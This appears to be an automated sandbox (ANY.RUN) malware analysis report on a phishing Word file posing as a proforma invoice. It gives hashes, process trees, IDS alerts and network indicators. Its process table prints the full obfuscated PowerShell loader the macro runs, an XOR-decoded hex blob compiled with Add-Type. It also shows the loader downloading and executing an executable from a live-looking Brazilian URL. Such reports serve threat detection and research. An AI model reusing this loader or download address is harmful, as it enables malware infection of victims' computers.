analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Proforma Invoice1110677 -BELUK, GERMANY.doc

Full analysis: https://app.any.run/tasks/7ba2eb6a-07e4-4172-bde7-c485a965d36b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2019, 12:37:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

EAB70DA1DAAAC26965608AB3BE6FF565

SHA1:

3812B59761621D68902EC06D1274D1DD6D550166

SHA256:

9992C85B04826C86C29968112D90ABF443209ACD925A1D8011530ECAFFB1C0A8

SSDEEP:

768:nI5BzsNhMbVwat0r1TkpXFRUHxv9/a+Xm6KAS8u3udpaAbeG4aFLp:8BAsbVwat0rFWXq5VKAS8uedIq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2524)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2524)
    • Starts Visual C# compiler

      • powershell.exe (PID: 2340)
    • Application was dropped or rewritten from another process

      • x1e63.exe (PID: 3152)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2340)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2340)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2340)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1618
ZipCompressedSize: 410
ZipCRC: 0xabd647f7
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe csc.exe cvtres.exe no specs x1e63.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Proforma Invoice1110677 -BELUK, GERMANY.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2340powershell -WindowStyle Hidden function x697dd {param($a66ee)$md1b8='d32fa';$a6414='';for ($i=0; $i -lt $a66ee.length;$i+=2){$ua9d9=[convert]::ToByte($a66ee.Substring($i,2),16);$a6414+=[char]($ua9d9 -bxor $md1b8[($i/2)%$md1b8.length]);}return $a6414;} $t93e6f = '11405b080644604b1515015e0913120d5d5546321d4046030c4a614708150d5e5748280a4757140e14605714170d5057155a11405b080644604b1515015e1c220805545c0912105a51155a11405b080644604b1515015e1c2f2e5f46410f0f0313611f1210565f482f0147096b6b1446500a080713510a001740121c5807500154541f68760a0d2d5e420913101b100d04165d570a5256111e230f10414b360e0d5d465b4323564636130b5073020516564115434d6e121614065f5b054117475312080713571e1501415c46280a47621213445e53520056011a2f0f10634614410e0404505250511e1515165a5c014111510b0707511a093d25085f7b0b110b41464e430f56400804080000444d44765c12131d635d0f0f10130f4643285c53022d0d514007131d111b3b411446500a080713411200105a5146041c4757140f447a5c123110411208050506504e1210415b08064447000550571a093d25085f7b0b110b41464e430f56400804080000444d44765c12131d635d0f0f100e103008164747070d34415d12040747104f3c444347040d0d5012151505475b0541014b4603130a1350090e081346575452005705492d5d46361516135a54545c551e33280a476212134451575e50061f1213080a47121000500a53074d445c471241115a5c124116050b05004d0869220d087a5f160e16471a442a01415c030d57011c020d08111e46240a47401f310b5a5c125c4661460a2c0b45572b04095c401f434813610315285241122416415d145c02525e15044d6e12151505475b0541014b4603130a1344090800135e545357561a2f0f1063461441170506070353521e2f0f10634614411302570756485a5c124102520057555c1a091614065f5b0541174753120807135b08154443045500071b1b1d280a4762121344505050045206125b410a575353034c4b045f5600571a4451510657525054550600515406545304461a1b5d08021b5104570105075b5c2d5d463615161d6803130b1a49010e105c120e05515205575a197a5c123110411213525206065753595e53520056011a0503525604534d1c050b5105001b1054545156065751020000565651010705535002065653510607515050111b4f5a0d551a13525206065753590e7b0815344740483b01415d4f1a035c4609410c5707075655084f33280a476212134454060403560e1a33280a476212134d060913080a4712035357575452045903090f074c124657545200570549110004535555011e01550651004a511c07024a0e114712035357575452044d1a49010e105c120e05515205575a19714b12043f6e1207045601515b1a544b01574d544b54004d544b0b561c5f7a5c123110411215500005065b2c0541410e00081d730a0d0b507a210d0b51530a49571a092b0016405a070d4a705d16184c52575453071f024a12555704524d571a090a535600574e0f0144122f0f1063461449110004535555011c320e2d5d4650554c1a19561954030304484840030257501f014f5a0c57070756550912310406705e0f040a47120b025d5501555c0a564546360151710a08015d464e485f404614080a54120d03570b06520559765c1008165c5c0b040a471c210410755d0a0501416207150c1b7708170d415d080c015d4648321456510f0008755d0a0501411c2711145f5b0500105a5d08250547534f4a466f6e1e50010501444a1c050b5105001b105200510506075157111b5d0c070a5455524a775d110f085c5302270d5f574e19520a0502054c110205555307045757515106045007060556005407035654520657575754560350555306565652550106075454065656035055025055550256535251020752575107045652545002025000060557045407104f4d0f51015e5550571b5d31165c5103121760460713107a5c000e4440040504020e5c0316446340090201404135150541462f0f025c1a0d03570b0652054d0862140e075641154f37475314154c40040504021a091404104640084154084f1614065f5b0541174753120807134112130d5d554619520a0502054c404614080a5412040757560a05574d484112130d5d55460b5305045555060e100252565553445a1747400f0f03135c020051510f3515165a5c014f215e4212185f555d14490d5d4646085903090f5d065501035907051c2a040a54460e5a0d180f54481f514b1204445e53520056010f250e0a455714154a675d241810561a040757560a05574a6047041210415b08064c5a1e54484802044f5a0a575353034f0e1a050905411b4e0c0507535453446d120c5652050152033f1b5b49534d1317460b5305045555061d7e030f03475a3b485f4e40031511415c460f005207045a194e'; $t93e6f2 = x697dd($t93e6f); Add-Type -TypeDefinition $t93e6f2; [z9cc325]::p63ac(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2532"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\8ztngbmu.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
388C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESD453.tmp" "c:\Users\admin\AppData\Local\Temp\CSCD442.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3152"C:\Users\admin\AppData\Roaming\x1e63.exe" C:\Users\admin\AppData\Roaming\x1e63.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 610
Read events
1 447
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
2524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7F2.tmp.cvr
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoCD44.tmp
MD5:
SHA256:
2340powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ODRPVZI7H8ZIJP7BEFLR.temp
MD5:
SHA256:
2532csc.exeC:\Users\admin\AppData\Local\Temp\CSCD442.tmp
MD5:
SHA256:
2532csc.exeC:\Users\admin\AppData\Local\Temp\8ztngbmu.pdb
MD5:
SHA256:
388cvtres.exeC:\Users\admin\AppData\Local\Temp\RESD453.tmp
MD5:
SHA256:
2532csc.exeC:\Users\admin\AppData\Local\Temp\8ztngbmu.dll
MD5:
SHA256:
2532csc.exeC:\Users\admin\AppData\Local\Temp\8ztngbmu.out
MD5:
SHA256:
2340powershell.exeC:\Users\admin\AppData\Local\Temp\8ztngbmu.cmdlinetext
MD5:C59600474650E31F87E46B1A3945A678
SHA256:EC5328089E3D04A0087FD4BA022AA535F4941158599D6FD8138AC69D49CA5348
2524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8B378DCC62035BBABEF8B1C2A131A338
SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2340
powershell.exe
GET
200
177.73.233.243:80
http://eletelportoes.com.br/500Vtemi.exe
BR
executable
1.07 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2340
powershell.exe
177.73.233.243:80
eletelportoes.com.br
WDI SOLUCOES EM TEC INFORMACAO LTDA
BR
suspicious

DNS requests

Domain
IP
Reputation
eletelportoes.com.br
  • 177.73.233.243
suspicious

Threats

PID
Process
Class
Message
2340
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2340
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144